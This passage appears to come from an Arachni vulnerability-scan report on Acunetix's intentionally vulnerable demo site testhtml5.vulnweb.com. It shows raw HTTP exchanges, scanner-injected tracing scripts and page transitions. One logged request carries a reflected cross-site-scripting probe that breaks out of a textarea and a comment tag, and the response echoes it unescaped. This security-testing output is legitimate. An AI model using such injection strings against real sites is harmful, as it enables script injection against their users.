<form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
link
input
id
using
GET
at
http://testhtml5.vulnweb.com/
pointing to
http://testhtml5.vulnweb.com/comment
.
0 1 2 3 4 | <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"> <i class="icon-comment" title="Comment"> </i> </a> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
link |
http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/comment |
|
|
http://testhtml5.vulnweb.com/comment?id=696a3680438a7af53a0a54d3d26469bf%3C/textarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7/%3E%3C!--%3Ctextarea%3E
Raw HTTP request used to retrieve the page.
GET /comment?id=696a3680438a7af53a0a54d3d26469bf%3C%2Ftextarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7%2F%3E%3C%21--%3Ctextarea%3E HTTP/1.1 Host: testhtml5.vulnweb.com Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->
<link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Action</li>
<li class="active"><a href="#/response">Response</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
Sorry, but commenting is currently disabled! <!-- 696a3680438a7af53a0a54d3d26469bf</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea> -->
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p>© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<script src="/static/app/app.js"></script>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 